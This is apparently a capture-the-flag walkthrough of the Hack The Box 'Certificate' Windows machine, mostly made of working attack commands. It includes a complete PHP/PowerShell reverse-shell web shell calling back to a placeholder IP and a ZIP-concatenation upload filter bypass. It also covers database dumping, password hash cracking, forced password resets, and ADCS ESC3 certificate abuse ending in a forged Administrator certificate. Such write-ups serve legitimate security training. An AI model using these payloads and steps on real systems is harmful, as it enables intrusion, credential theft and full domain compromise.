All write-ups
12 min read

HTB: Certificate

HTBWindowsActive DirectoryESC3PrivEsc

Reconnaissance

Initial enumeration begins with web crawling and discovery of the target domains.

echo "http://certificate.htb" | hakrawler -d 10 > hakrawler.txt

During the web recon, a potentially vulnerable Google Maps API key was discovered, though it led to a dead end. Proceeding with authenticated enumeration using a session cookie (representing a logged-in student):

echo "http://certificate.htb/courses.php" | hakrawler -h "Cookie: PHPSESSID=llmr6293o0f9f5vjrsi8kbjnfr" -d 10 -insecure > hakrawler.txt

This reveals an interesting upload endpoint: http://certificate.htb/upload.php?s_id=ID

Initial Access: Evasive ZIP Upload

The application accepts ZIP file uploads but blocks scripts. A known evasion technique involves concatenating a legitimate ZIP with a malicious ZIP to bypass basic filters.

Creating the Payload

Generate a malicious PHP web shell utilizing PowerShell for a reverse connection:

// shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>

Concatenating ZIP Files

mkdir malicious_files
mv shell.php malicious_files/
zip -r malicious.zip malicious_files/
zip benign.zip legit.pdf
cat benign.zip malicious.zip > combined.zip

After uploading combined.zip, the application extracts it. The malicious payload is triggered via: http://certificate.htb/static/extracted-path/malicious_files/shell.php

Internal Enumeration & Credential Extraction

Once a foothold is established in the xampp directory, local enumeration yields database credentials.

Get-ChildItem -Recurse -Filter "db.php" -ErrorAction SilentlyContinue

Extracting db.php reveals database credentials for certificate_webapp_user:

$db_user = 'certificate_webapp_user';
$db_passwd = '[REDACTED]';

Extract the database using mysqldump to obtain user hashes:

cmd /c mysqldump -u certificate_webapp_user -p"[REDACTED]" Certificate_WEBAPP_DB > backup.sql 2>&1

Transfer the backup file using base64 encoding or via an SMB server. The SQL dump contains password hashes. Cracking the hash for sara.b:

hashcat -m 3200 -a 0 hash_sara /usr/share/wordlists/rockyou.txt
# Result: [REDACTED]

Authenticate via WinRM:

evil-winrm -i certificate.htb -u sara.b@certificate.htb -p '[REDACTED]'

Active Directory Pivot

Option 1: GenericAll Exploitation

Using BloodHound, it is discovered that sara.b has GenericAll privileges over two other users (lion.sk and ryan.k).

bloodhound-python -d certificate.htb -u sara.b@certificate.htb -p "[REDACTED]" -gc DC01.certificate.htb -c all -ns 10.129.171.26

Force-reset the password for lion.sk:

net rpc password "lion.sk" "[REDACTED]" -U "certificate.htb"/"sara.b"%"[REDACTED]" -S "DC01.certificate.htb"
evil-winrm -i certificate.htb -u lion.sk@certificate.htb -p '[REDACTED]'

Option 2: PCAP Analysis & AS-REP Roasting

Alternatively, a packet capture file (WS-01_PktMon.pcap) found in Sara's documents contains Kerberos traffic. Extracting it:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap")) > C:\xampp\htdocs\certificate.htb\static\pkt.b64

Using Krb5RoastParser on the PCAP:

python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req

Extract the hash, append .HTB to the target domain, and crack it:

hashcat -m 19900 kerberos.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
# Result: [REDACTED]

Privilege Escalation

Checking privileges for lion.sk:

whoami /priv

Active Directory Certificate Services (ESC3)

Run certipy to identify vulnerable certificate templates:

certipy find -vulnerable -u lion.sk@certificate.htb -p '[REDACTED]' -dc-ip 10.129.42.143 -stdout

The output highlights Delegated-CRA as vulnerable to ESC3 (Enrollment Agent Certificate Template). Request a certificate using lion.sk and forge a certificate on behalf of ryan.k, who possesses SeManageVolumePrivilege.

certipy req -u 'lion.sk@certificate.htb' -p '[REDACTED]' -dc-ip '10.129.42.143' -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
certipy req -u 'lion.sk@certificate.htb' -p '[REDACTED]' -dc-ip '10.129.42.143' -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'
certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.42.143'

Extract the NT hash and authenticate as ryan.k:

evil-winrm -i certificate.htb -u ryan.k@certificate.htb -H [REDACTED]

Abusing SeManageVolumePrivilege

ryan.k has SeManageVolumePrivilege. Using the SeManageVolumeExploit:

update SeManageVolumeExploit.exe
cmd /c SeManageVolumeExploit.exe

This exploit grants full permissions to the C:\ drive. Retrieve the root CA certificate:

certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx

Transfer ca.pfx to the attacking machine and forge a Golden Ticket for Administrator:

certipy forge -ca-pfx ca.pfx -out golden_ticket.pfx -upn Administrator
certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.42.143 -user Administrator -domain certificate.htb

Retrieve the NT hash for Administrator and obtain root access.